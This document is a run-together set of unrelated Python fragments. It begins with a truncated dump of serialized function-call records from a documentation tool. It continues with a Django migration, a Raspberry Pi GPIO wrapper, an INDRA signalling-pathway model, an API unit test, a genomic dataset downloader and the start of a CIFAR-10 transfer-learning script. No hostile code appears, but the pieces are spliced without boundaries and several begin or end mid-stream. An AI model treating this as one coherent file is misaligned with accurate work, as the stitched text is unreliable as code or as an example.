'os.path.isdir', 'isdir', (['self.project_root_dir'], {}), '(self.project_root_dir)\n', (23647, 23670), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((23765, 23861), 'cardinal_pythonlib.fileops.relative_filename_within_dir', 'relative_filename_within_dir', ([], {'filename': 'self.index_filename', 'directory': 'self.project_root_dir'}), '(filename=self.index_filename, directory=self.\n project_root_dir)\n', (23793, 23861), False, 'from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir\n'), ((24043, 24141), 'cardinal_pythonlib.fileops.relative_filename_within_dir', 'relative_filename_within_dir', ([], {'filename': 'self.highest_code_dir', 'directory': 'self.project_root_dir'}), '(filename=self.highest_code_dir, directory=self\n .project_root_dir)\n', (24071, 24141), False, 'from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir\n'), ((24337, 24439), 'cardinal_pythonlib.fileops.relative_filename_within_dir', 'relative_filename_within_dir', ([], {'filename': 'self.autodoc_rst_root_dir', 'directory': 'self.project_root_dir'}), '(filename=self.autodoc_rst_root_dir, directory=\n self.project_root_dir)\n', (24365, 24439), False, 'from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir\n'), ((24963, 24978), 'cardinal_pythonlib.reprfunc.auto_repr', 'auto_repr', (['self'], {}), '(self)\n', (24972, 24978), False, 'from cardinal_pythonlib.reprfunc import auto_repr\n'), ((29172, 29199), 'fnmatch.fnmatch', 'fnmatch', (['filename', 'globtext'], {}), '(filename, globtext)\n', (29179, 29199), False, 'from fnmatch import fnmatch\n'), ((29304, 29322), 'os.path.basename', 'basename', (['filename'], {}), '(filename)\n', (29312, 29322), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((29334, 29358), 'fnmatch.fnmatch', 'fnmatch', (['bname', 'globtext'], {}), '(bname, 
globtext)\n', (29341, 29358), False, 'from fnmatch import fnmatch\n'), ((31126, 31194), 'cardinal_pythonlib.fileops.relative_filename_within_dir', 'relative_filename_within_dir', (['source_filename', 'self.highest_code_dir'], {}), '(source_filename, self.highest_code_dir)\n', (31154, 31194), False, 'from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir\n'), ((31224, 31249), 'os.path.basename', 'basename', (['source_filename'], {}), '(source_filename)\n', (31232, 31249), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((32698, 32755), 'os.path.relpath', 'relpath', (['self.index_filename'], {'start': 'self.project_root_dir'}), '(self.index_filename, start=self.project_root_dir)\n', (32705, 32755), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((7118, 7145), 'os.path.expanduser', 'expanduser', (['source_filename'], {}), '(source_filename)\n', (7128, 7145), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((7187, 7215), 'os.path.expanduser', 'expanduser', (['project_root_dir'], {}), '(project_root_dir)\n', (7197, 7215), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((7260, 7291), 'os.path.expanduser', 'expanduser', (['target_rst_filename'], {}), '(target_rst_filename)\n', (7270, 7291), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((8754, 8784), 'os.path.splitext', 'splitext', (['self.source_filename'], {}), '(self.source_filename)\n', (8762, 8784), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((11078, 11096), 'os.path.splitext', 'splitext', (['filepath'], {}), '(filepath)\n', (11086, 
11096), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((11410, 11440), 'os.path.splitext', 'splitext', (['self.source_filename'], {}), '(self.source_filename)\n', (11418, 11440), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((11596, 11640), 'pygments.lexers.get_lexer_for_filename', 'get_lexer_for_filename', (['self.source_filename'], {}), '(self.source_filename)\n', (11618, 11640), False, 'from pygments.lexers import get_lexer_for_filename\n'), ((22502, 22528), 'os.path.expanduser', 'expanduser', (['index_filename'], {}), '(index_filename)\n', (22512, 22528), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((22646, 22674), 'os.path.expanduser', 'expanduser', (['project_root_dir'], {}), '(project_root_dir)\n', (22656, 22674), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((22720, 22752), 'os.path.expanduser', 'expanduser', (['autodoc_rst_root_dir'], {}), '(autodoc_rst_root_dir)\n', (22730, 22752), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((22794, 22822), 'os.path.expanduser', 'expanduser', (['highest_code_dir'], {}), '(highest_code_dir)\n', (22804, 22822), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((28040, 28055), 'os.path.expanduser', 'expanduser', (['sfg'], {}), '(sfg)\n', (28050, 28055), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((28141, 28185), 'glob.glob', 'glob.glob', (['sfg_expanded'], {'recursive': 'recursive'}), '(sfg_expanded, recursive=recursive)\n', (28150, 28185), False, 'import glob\n'), ((31321, 
31352), 'os.path.dirname', 'dirname', (['highest_code_to_target'], {}), '(highest_code_to_target)\n', (31328, 31352), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((7458, 7493), 'os.path.expanduser', 'expanduser', (['python_package_root_dir'], {}), '(python_package_root_dir)\n', (7468, 7493), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((10619, 10645), 'os.path.expanduser', 'expanduser', (['index_filename'], {}), '(index_filename)\n', (10629, 10645), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((22885, 22920), 'os.path.expanduser', 'expanduser', (['python_package_root_dir'], {}), '(python_package_root_dir)\n', (22895, 22920), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((33160, 33174), 'os.path.dirname', 'dirname', (['other'], {}), '(other)\n', (33167, 33174), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n')] |
# Generated by Django 2.1.3 on 2018-11-08 21:12
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('monsterapi', '0004_name'),
]
operations = [
migrations.AddField(
model_name='monster',
name='name',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='monsterapi.Name'),
),
]
| [
"django.db.models.ForeignKey"
] | [((355, 467), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""monsterapi.Name"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, to='monsterapi.Name')\n", (372, 467), False, 'from django.db import migrations, models\n')] |
import pandas as pd
from wikidataintegrator import wdi_login
import utils
from login import WDPASS, WDUSER
import argparse
import sys
parser = argparse.ArgumentParser()
df = utils.get_complex_portal_species_ids()
print(df.to_markdown()) | [
"utils.get_complex_portal_species_ids",
"argparse.ArgumentParser"
] | [((144, 169), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (167, 169), False, 'import argparse\n'), ((175, 213), 'utils.get_complex_portal_species_ids', 'utils.get_complex_portal_species_ids', ([], {}), '()\n', (211, 213), False, 'import utils\n')] |
import cv2
print(cv2.getBuildInformation())
| [
"cv2.getBuildInformation"
] | [((18, 43), 'cv2.getBuildInformation', 'cv2.getBuildInformation', ([], {}), '()\n', (41, 43), False, 'import cv2\n')] |
# =============================================================================
# System imports
import logging
import RPi.GPIO as RPiGPIO
# =============================================================================
# Logger setup
logger = logging.getLogger(__name__)
# =============================================================================
# Classes
class GPIO:
IN = 0
OUT = 1
_initialized = False
def __init__(self,name,channel,inout,default_value=0,active_high=True,debug=False):
self._name = name
self._channel = channel
self._inout = inout
self._active_high = active_high
self._debug = debug
logger.debug('Initializing GPIO {:<10} channel={} inout={} default={} active_high={} debug={}'
.format( self._name
, self._channel
, "in" if inout == GPIO.IN else "out"
, default_value
, self._active_high
, self._debug ))
if self._debug == False:
if GPIO._initialized == False:
self._initialize()
rpigpio_inout = RPiGPIO.IN if inout == GPIO.IN else RPiGPIO.OUT
initial_state = None
if inout == GPIO.IN:
RPiGPIO.setup( self._channel
, rpigpio_inout )
else:
initial_state = RPiGPIO.LOW
if (self._active_high == True and default_value == 1) or \
(self._active_high == False and default_value == 0):
initial_state = RPiGPIO.HIGH
RPiGPIO.setup( self._channel
, rpigpio_inout
, initial=initial_state)
def __del__(self):
if self._debug == False:
RPiGPIO.cleanup( self._channel )
def _initialize(self):
logger.debug('Initializing RpiGPIO module')
RPiGPIO.setmode(RPiGPIO.BOARD)
GPIO._initialized = True
def set(self,value):
if self._inout == GPIO.IN:
logger.error('Can\'t set input GPIO {}'.format(self._name))
else:
physical_value = value if self._active_high == True else not value
logger.debug('Setting GPIO {:<10} to {} (logical value)'.format(self._name,1 if value else 0))
if self._debug == False:
RPiGPIO.output( self._channel, physical_value )
| [
"logging.getLogger",
"RPi.GPIO.cleanup",
"RPi.GPIO.setup",
"RPi.GPIO.output",
"RPi.GPIO.setmode"
] | [((244, 271), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (261, 271), False, 'import logging\n'), ((1945, 1975), 'RPi.GPIO.setmode', 'RPiGPIO.setmode', (['RPiGPIO.BOARD'], {}), '(RPiGPIO.BOARD)\n', (1960, 1975), True, 'import RPi.GPIO as RPiGPIO\n'), ((1824, 1854), 'RPi.GPIO.cleanup', 'RPiGPIO.cleanup', (['self._channel'], {}), '(self._channel)\n', (1839, 1854), True, 'import RPi.GPIO as RPiGPIO\n'), ((1282, 1325), 'RPi.GPIO.setup', 'RPiGPIO.setup', (['self._channel', 'rpigpio_inout'], {}), '(self._channel, rpigpio_inout)\n', (1295, 1325), True, 'import RPi.GPIO as RPiGPIO\n'), ((1629, 1695), 'RPi.GPIO.setup', 'RPiGPIO.setup', (['self._channel', 'rpigpio_inout'], {'initial': 'initial_state'}), '(self._channel, rpigpio_inout, initial=initial_state)\n', (1642, 1695), True, 'import RPi.GPIO as RPiGPIO\n'), ((2395, 2440), 'RPi.GPIO.output', 'RPiGPIO.output', (['self._channel', 'physical_value'], {}), '(self._channel, physical_value)\n', (2409, 2440), True, 'import RPi.GPIO as RPiGPIO\n')] |
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
from indra.statements import *
from indra.preassembler.grounding_mapper import GroundingMapper, \
default_grounding_map
def get_statements():
statements = []
egf = Agent('EGF')
egfr = Agent('EGFR')
st = Complex([egf, egfr])
statements.append(st)
egfre = Agent('EGFR', bound_conditions=[BoundCondition(egf, True)])
egfre = Agent('EGFR', bound_conditions=[BoundCondition(egf, True)])
st = Complex([egfre, egfre])
statements.append(st)
egfrdimer = Agent('EGFR', bound_conditions=[BoundCondition(egfr, True)])
st = Transphosphorylation(egfrdimer, 'Y')
statements.append(st)
egfrpY = Agent('EGFR', mods=[ModCondition('phosphorylation', 'Y')])
grb2 = Agent('GRB2')
st = Complex([egfrpY, grb2])
statements.append(st)
grb2bound = Agent('GRB2', bound_conditions=[BoundCondition(egfr, True)])
sos1 = Agent('SOS1')
st = Complex([grb2bound, sos1])
statements.append(st)
hras = Agent('HRAS')
kras = Agent('KRAS')
nras = Agent('NRAS')
gdp = Agent('GDP')
for ras in [hras, kras, nras]:
st = Complex([ras, gdp])
statements.append(st)
sos1bound = Agent('SOS1', bound_conditions=[BoundCondition(grb2, True)])
hras_gdp = Agent('HRAS', bound_conditions=[BoundCondition(gdp, True)])
kras_gdp = Agent('KRAS', bound_conditions=[BoundCondition(gdp, True)])
nras_gdp = Agent('NRAS', bound_conditions=[BoundCondition(gdp, True)])
for ras_gdp in [hras_gdp, kras_gdp, nras_gdp]:
st = Complex([sos1bound, ras_gdp])
statements.append(st)
st = ActiveForm(ras_gdp, 'activity', False)
statements.append(st)
hras_bound = Agent('HRAS', bound_conditions=[BoundCondition(sos1, True)])
kras_bound = Agent('KRAS', bound_conditions=[BoundCondition(sos1, True)])
nras_bound = Agent('NRAS', bound_conditions=[BoundCondition(sos1, True)])
sos1bound = Agent('SOS1', bound_conditions=[BoundCondition(grb2, True)])
for ras_bound in [hras_bound, kras_bound, nras_bound]:
st = Complex([sos1bound, ras_bound])
statements.append(st)
gtp = Agent('GTP')
hras_gtp = Agent('HRAS', bound_conditions=[BoundCondition(gtp, True)])
kras_gtp = Agent('KRAS', bound_conditions=[BoundCondition(gtp, True)])
nras_gtp = Agent('NRAS', bound_conditions=[BoundCondition(gtp, True)])
braf = Agent('BRAF')
for ras_gtp in [hras_gtp, kras_gtp, nras_gtp]:
st = Complex([ras_gtp, braf])
statements.append(st)
st = ActiveForm(ras_gtp, 'activity', True)
statements.append(st)
hras_braf = Agent('BRAF', bound_conditions=[BoundCondition(hras, True)])
kras_braf = Agent('BRAF', bound_conditions=[BoundCondition(kras, True)])
nras_braf = Agent('BRAF', bound_conditions=[BoundCondition(nras, True)])
for braf1 in [hras_braf, kras_braf, nras_braf]:
for braf2 in [hras_braf, kras_braf, nras_braf]:
st = Complex([braf1, braf2])
statements.append(st)
braf_bound = Agent('BRAF', bound_conditions=[BoundCondition(braf, True)])
st = Transphosphorylation(braf_bound)
statements.append(st)
braf_phos = Agent('BRAF', mods=[ModCondition('phosphorylation')])
mek1 = Agent('MAP2K1')
mek2 = Agent('MAP2K2')
st = ActiveForm(braf_phos, 'kinase', True)
statements.append(st)
st = Phosphorylation(braf_phos, mek1)
statements.append(st)
st = Phosphorylation(braf_phos, mek2)
statements.append(st)
mek1_phos = Agent('MAP2K1', mods=[ModCondition('phosphorylation')])
mek2_phos = Agent('MAP2K2', mods=[ModCondition('phosphorylation')])
mapk1 = Agent('MAPK1')
mapk3 = Agent('MAPK3')
st = ActiveForm(mek1_phos, 'kinase', True)
statements.append(st)
st = ActiveForm(mek2_phos, 'kinase', True)
statements.append(st)
st = Phosphorylation(braf_phos, mek1)
statements.append(st)
st = Phosphorylation(braf_phos, mek2)
statements.append(st)
for mek in [mek1_phos, mek2_phos]:
for erk in [mapk1, mapk3]:
st = Phosphorylation(mek, erk)
for st in statements:
st.belief = 1
st.evidence.append(Evidence(source_api='assertion'))
# Update the statements with grounding info. To do this, we set the "text"
# field of the db_refs to copy from the agent name, then run the grounding
# mapper
for st in statements:
for ag in st.agent_list():
if ag is None:
continue
else:
ag.db_refs = {'TEXT': ag.name}
# Now load the grounding map and run
gm = GroundingMapper(default_grounding_map)
mapped_stmts = gm.map_agents(statements)
# This shouldn't change anything, but just in case...
renamed_stmts = gm.rename_agents(mapped_stmts)
return renamed_stmts
| [
"indra.preassembler.grounding_mapper.GroundingMapper"
] | [((4729, 4767), 'indra.preassembler.grounding_mapper.GroundingMapper', 'GroundingMapper', (['default_grounding_map'], {}), '(default_grounding_map)\n', (4744, 4767), False, 'from indra.preassembler.grounding_mapper import GroundingMapper, default_grounding_map\n')] |
import unittest
import base_test
import json
class PrincipalClaimTest(base_test.BaseTest):
def setUp(self):
super(PrincipalClaimTest, self).setUp()
self._org = self.post('/api/orgs', {"name":"claim_org", "url":"https://myorg.com"})
self._principal = self.post('/api/orgs/%s/principals' % self._org["id"], {"username":"my_principal", "organization_id":self._org["id"]})
self._realm = self.post('/api/realms', {"id":"resource_realm"})
self._license = self.post('/api/orgs/%s/licenses' % self._org["id"], {"name":"my_license", "organization_id":self._org["id"], "effective_at": "2019-01-01T00:00:00", "expired_at": "2030-01-01T00:00:00"})
self._resource = self.post('/api/realms/%s/resources' % self._realm["id"], {"resource_name":"my_resource", "realm_id":self._realm["id"]})
def tearDown(self):
self.delete('/api/realms/%s/resources/%s/claims/%s' % (self._realm["id"], self._resource["id"], self._claim["id"]))
self.delete('/api/orgs/%s/licenses/%s' % (self._org["id"], self._license["id"]))
self.delete('/api/realms/%s/resources/%s' % (self._realm["id"], self._resource["id"]))
self.delete('/api/realms/%s' % self._realm["id"])
self.delete('/api/orgs/%s' % self._org["id"])
self.delete('/api/orgs/%s/principals/%s' % (self._org["id"], self._principal["id"]))
def test_add_remove_claim_to_principal(self):
self._claim = self.post('/api/realms/%s/resources/%s/claims' % (self._realm["id"], self._resource["id"]), {"action":"READ", "realm_id":self._realm["id"]})
self.assertEquals("READ", self._claim["action"])
#
resp = self.put('/api/realms/%s/resources/%s/claims/%s/principals/%s' % (self._realm["id"], self._resource["id"], self._claim["id"], self._principal["id"]), {})
self.assertEquals(1, resp, json.dumps(resp))
resp = self.delete('/api/realms/%s/resources/%s/claims/%s/principals/%s' % (self._realm["id"], self._resource["id"], self._claim["id"], self._principal["id"]))
self.assertEquals(1, resp, json.dumps(resp))
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"json.dumps"
] | [((2122, 2137), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2135, 2137), False, 'import unittest\n'), ((1851, 1867), 'json.dumps', 'json.dumps', (['resp'], {}), '(resp)\n', (1861, 1867), False, 'import json\n'), ((2072, 2088), 'json.dumps', 'json.dumps', (['resp'], {}), '(resp)\n', (2082, 2088), False, 'import json\n')] |
import pandas as pd
import yaml
import gzip
import re
import urllib
import shutil # for removing and creating folders
from pathlib import Path
from tqdm.autonotebook import tqdm
import warnings
from Bio import SeqIO
from Bio.Seq import Seq
from .cloud_caching import CLOUD_CACHE, download_from_cloud_cache
CACHE_PATH = Path.home() / '.genomic_benchmarks'
REF_CACHE_PATH = CACHE_PATH / 'fasta'
DATASET_DIR_PATH = (Path(__file__).parents[0] / '..' / '..' / '..' / 'datasets').resolve()
def download_dataset(interval_list_dataset, version=None, dest_path=CACHE_PATH, cache_path=REF_CACHE_PATH,
force_download=False, use_cloud_cache=True):
'''
Transform an interval-list genomic dataset into a full-seq genomic dataset.
Parameters:
interval_list_dataset (str or Path): Either a path or a name of dataset included in this package.
version (int): Version of the dataset.
dest_path (str or Path): Folder to store the full-seq dataset.
cache_path (str or Path): Folder to store the downloaded references.
force_download (bool): If True, force downloading of references.
use_cloud_cache (bool): If True, use the cloud cache for downloading a full-seq genomic datasets.
Returns:
seq_dataset_path (Path): Path to the full-seq dataset.
'''
interval_list_dataset = _guess_location(interval_list_dataset)
metadata = _check_dataset_existence(interval_list_dataset, version)
dataset_name = _get_dataset_name(interval_list_dataset)
if version is None:
version = metadata['version']
if use_cloud_cache and ((dataset_name, version) in CLOUD_CACHE):
Path(dest_path).mkdir(parents=True, exist_ok=True) # to be sure "./.genomic_benchmarks" exists
return download_from_cloud_cache((dataset_name, version), Path(dest_path) / dataset_name)
refs = _download_references(metadata, cache_path=cache_path, force=force_download)
fastas = _load_fastas_into_memory(refs, cache_path=cache_path)
_remove_and_create(Path(dest_path) / dataset_name)
_remove_and_create(Path(dest_path) / dataset_name / "train")
_remove_and_create(Path(dest_path) / dataset_name / "test")
for c in metadata['classes']:
for t in ['train', 'test']:
dt_filename = Path(interval_list_dataset) / t / (c + '.csv.gz')
dt = pd.read_csv(dt_filename, compression="gzip")
ref_name = _get_reference_name(metadata['classes'][c]['url'])
dt['seq'] = _fill_seq_column(fastas[ref_name], dt)
folder_filename = Path(dest_path) / dataset_name / t / c
_remove_and_create(folder_filename)
for row in dt.iterrows():
row_filename = folder_filename / (str(row[1]['id']) + '.txt')
row_filename.write_text(row[1]['seq'])
return Path(dest_path) / dataset_name
def _guess_location(dataset_path):
if Path(dataset_path).exists():
return Path(dataset_path)
elif (DATASET_DIR_PATH / str(dataset_path)).exists():
return DATASET_DIR_PATH / str(dataset_path)
else:
raise FileNotFoundError(f'Dataset {dataset_path} not found.')
def _check_dataset_existence(interval_list_dataset, version):
# check that the dataset exists, returns its metadata
path = Path(interval_list_dataset)
if not path.exists():
raise FileNotFoundError(f'Dataset {interval_list_dataset} not found.')
metadata_path = path / 'metadata.yaml'
if not metadata_path.exists():
raise FileNotFoundError(f'Dataset {interval_list_dataset} does not contain `metadata.yaml` file.')
with open(metadata_path, "r") as fr:
metadata = yaml.safe_load(fr)
if version is not None:
if version != metadata['version']:
raise ValueError(f"Dataset version {version} does not match the version in metadata {metadata['version']}.")
else:
warnings.warn(f"No version specified. Using version {metadata['version']}.")
return metadata
def _get_dataset_name(path):
# get the dataset name from the path
return Path(path).stem
def _download_references(metadata, cache_path, force=False):
# download all references from the metadata into cache_path folder
cache_path = Path(cache_path)
if not cache_path.exists():
cache_path.mkdir(parents=True)
refs = {(c['url'], c['type'], c.get('extra_processing')) for c in metadata['classes'].values()}
for ref in refs:
ref_path = cache_path / _get_reference_name(ref[0])
if not ref_path.exists() or force:
_download_url(ref[0], ref_path)
else:
print(f'Reference {ref_path} already exists. Skipping.')
return refs
def _get_reference_name(url):
# get the reference name from the url
### TODO: better naming scheme (e.g. taking the same file from 2 Ensembl releases)
return url.split('/')[-1]
def _download_url(url, dest):
# download a file from url to dest
if Path(dest).exists():
Path(dest).unlink()
print(f"Downloading {url}")
class DownloadProgressBar(tqdm):
# for progress bar
def update_to(self, b=1, bsize=1, tsize=None):
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
with DownloadProgressBar(unit='B', unit_scale=True,
miniters=1, desc=str(dest)) as t:
# TODO: adapt fastdownload code instead of urllib
urllib.request.urlretrieve(url, filename=dest, reporthook=t.update_to)
EXTRA_PREPROCESSING = {
# known extra preprocessing steps
'default': [None, None, lambda x: x],
'ENSEMBL_HUMAN_GENOME': [24, 'MT', lambda x: "chr"+x], # use only chromosomes, not contigs, and add chr prefix
'ENSEMBL_MOUSE_GENOME': [21, 'MT', lambda x: "chr"+x], # use only chromosomes, not contigs, and add chr prefix
'ENSEMBL_HUMAN_TRANSCRIPTOME': [190_000, None, lambda x: re.sub("ENST([0-9]*)[.][0-9]*", "ENST\\1", x)] # remove the version number from the ensembl id
}
def _load_fastas_into_memory(refs, cache_path):
# load all references into memory
fastas = {}
for ref in refs:
ref_path = Path(cache_path) / _get_reference_name(ref[0])
ref_type = ref[1]
ref_extra_preprocessing = ref[2] if ref[2] is not None else "default"
if ref_extra_preprocessing not in EXTRA_PREPROCESSING:
raise ValueError(f"Unknown extra preprocessing: {ref_extra_preprocessing}")
if ref_type == 'fa.gz':
fasta = _fastagz2dict(ref_path, fasta_total=EXTRA_PREPROCESSING[ref_extra_preprocessing][0],
stop_id=EXTRA_PREPROCESSING[ref_extra_preprocessing][1],
region_name_transform=EXTRA_PREPROCESSING[ref_extra_preprocessing][2])
fastas[_get_reference_name(ref[0])] = fasta
else:
raise ValueError(f'Unknown reference type {ref_type}')
return fastas
def _fastagz2dict(fasta_path, fasta_total=None, stop_id=None, region_name_transform=lambda x: x):
# load gzipped fasta into dictionary
fasta = {}
with gzip.open(fasta_path, "rt") as handle:
for record in tqdm(SeqIO.parse(handle, "fasta"), total=fasta_total):
fasta[region_name_transform(record.id)] = str(record.seq)
if stop_id and (record.id == stop_id):
# stop, do not read small contigs
break
return fasta
def _fill_seq_column(fasta, df):
# fill seq column in DataFrame tab
if not all([r in fasta for r in df['region']]):
missing_regions = list({r for r in df['region'] if r not in fasta})
if len(missing_regions) > 5: missing_regions = missing_regions[:6]
raise ValueError('Some regions not found in the reference, e.g. ' + " ".join([str(r) for r in missing_regions]))
output = pd.Series([_rev(fasta[region][start:end], strand) for region, start, end, strand in zip(df['region'], df['start'], df['end'], df['strand'])])
return output
def _rev(seq, strand):
# reverse complement
if strand == '-':
return str(Seq(seq).reverse_complement())
else:
return seq
def _remove_and_create(path):
# cleaning step: remove the folder and then create it again
if path.exists():
shutil.rmtree(path)
path.mkdir(parents=True)
def remove_dataset_from_disk(interval_list_dataset, version=None, dest_path=CACHE_PATH):
'''
Remove the full-seq dataset from the disk.
Parameters:
interval_list_dataset (str or Path): Either a path or a name of dataset included in this package.
version (int): Version of the dataset.
dest_path (str or Path): Folder to store the full-seq dataset.
'''
interval_list_dataset = _guess_location(interval_list_dataset)
metadata = _check_dataset_existence(interval_list_dataset, version)
dataset_name = _get_dataset_name(interval_list_dataset)
path = Path(dest_path) / dataset_name
if path.exists():
shutil.rmtree(path) | [
"pandas.read_csv",
"urllib.request.urlretrieve",
"pathlib.Path",
"gzip.open",
"pathlib.Path.home",
"Bio.Seq.Seq",
"yaml.safe_load",
"Bio.SeqIO.parse",
"shutil.rmtree",
"warnings.warn",
"re.sub"
] | [((323, 334), 'pathlib.Path.home', 'Path.home', ([], {}), '()\n', (332, 334), False, 'from pathlib import Path\n'), ((3420, 3447), 'pathlib.Path', 'Path', (['interval_list_dataset'], {}), '(interval_list_dataset)\n', (3424, 3447), False, 'from pathlib import Path\n'), ((4375, 4391), 'pathlib.Path', 'Path', (['cache_path'], {}), '(cache_path)\n', (4379, 4391), False, 'from pathlib import Path\n'), ((2959, 2974), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (2963, 2974), False, 'from pathlib import Path\n'), ((3078, 3096), 'pathlib.Path', 'Path', (['dataset_path'], {}), '(dataset_path)\n', (3082, 3096), False, 'from pathlib import Path\n'), ((3799, 3817), 'yaml.safe_load', 'yaml.safe_load', (['fr'], {}), '(fr)\n', (3813, 3817), False, 'import yaml\n'), ((4029, 4105), 'warnings.warn', 'warnings.warn', (['f"""No version specified. Using version {metadata[\'version\']}."""'], {}), '(f"No version specified. Using version {metadata[\'version\']}.")\n', (4042, 4105), False, 'import warnings\n'), ((4209, 4219), 'pathlib.Path', 'Path', (['path'], {}), '(path)\n', (4213, 4219), False, 'from pathlib import Path\n'), ((5609, 5679), 'urllib.request.urlretrieve', 'urllib.request.urlretrieve', (['url'], {'filename': 'dest', 'reporthook': 't.update_to'}), '(url, filename=dest, reporthook=t.update_to)\n', (5635, 5679), False, 'import urllib\n'), ((7283, 7310), 'gzip.open', 'gzip.open', (['fasta_path', '"""rt"""'], {}), "(fasta_path, 'rt')\n", (7292, 7310), False, 'import gzip\n'), ((8476, 8495), 'shutil.rmtree', 'shutil.rmtree', (['path'], {}), '(path)\n', (8489, 8495), False, 'import shutil\n'), ((9175, 9190), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (9179, 9190), False, 'from pathlib import Path\n'), ((9236, 9255), 'shutil.rmtree', 'shutil.rmtree', (['path'], {}), '(path)\n', (9249, 9255), False, 'import shutil\n'), ((2146, 2161), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (2150, 2161), False, 'from pathlib import 
Path\n'), ((2471, 2515), 'pandas.read_csv', 'pd.read_csv', (['dt_filename'], {'compression': '"""gzip"""'}), "(dt_filename, compression='gzip')\n", (2482, 2515), True, 'import pandas as pd\n'), ((3034, 3052), 'pathlib.Path', 'Path', (['dataset_path'], {}), '(dataset_path)\n', (3038, 3052), False, 'from pathlib import Path\n'), ((5108, 5118), 'pathlib.Path', 'Path', (['dest'], {}), '(dest)\n', (5112, 5118), False, 'from pathlib import Path\n'), ((6078, 6123), 're.sub', 're.sub', (['"""ENST([0-9]*)[.][0-9]*"""', '"""ENST\\\\1"""', 'x'], {}), "('ENST([0-9]*)[.][0-9]*', 'ENST\\\\1', x)\n", (6084, 6123), False, 'import re\n'), ((6319, 6335), 'pathlib.Path', 'Path', (['cache_path'], {}), '(cache_path)\n', (6323, 6335), False, 'from pathlib import Path\n'), ((7349, 7377), 'Bio.SeqIO.parse', 'SeqIO.parse', (['handle', '"""fasta"""'], {}), "(handle, 'fasta')\n", (7360, 7377), False, 'from Bio import SeqIO\n'), ((1773, 1788), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (1777, 1788), False, 'from pathlib import Path\n'), ((1935, 1950), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (1939, 1950), False, 'from pathlib import Path\n'), ((2201, 2216), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (2205, 2216), False, 'from pathlib import Path\n'), ((2266, 2281), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (2270, 2281), False, 'from pathlib import Path\n'), ((5137, 5147), 'pathlib.Path', 'Path', (['dest'], {}), '(dest)\n', (5141, 5147), False, 'from pathlib import Path\n'), ((2404, 2431), 'pathlib.Path', 'Path', (['interval_list_dataset'], {}), '(interval_list_dataset)\n', (2408, 2431), False, 'from pathlib import Path\n'), ((8291, 8299), 'Bio.Seq.Seq', 'Seq', (['seq'], {}), '(seq)\n', (8294, 8299), False, 'from Bio.Seq import Seq\n'), ((2685, 2700), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (2689, 2700), False, 'from pathlib import Path\n'), ((417, 431), 'pathlib.Path', 'Path', (['__file__'], 
{}), '(__file__)\n', (421, 431), False, 'from pathlib import Path\n')] |
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
import time
from datetime import timedelta
import os
# Importing a helper module for the functions of the Inception model.
import inception
import cifar10
from cifar10 import num_classes
from inception import transfer_values_cache
#Importing the color map for plotting each class with different color.
import matplotlib.cm as color_map
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
from sklearn.metrics import confusion_matrix
cifar10.data_path = "data/CIFAR-10/"
cifar10.maybe_download_and_extract()
class_names = cifar10.load_class_names()
print(class_names)
print('Loading the training set...')
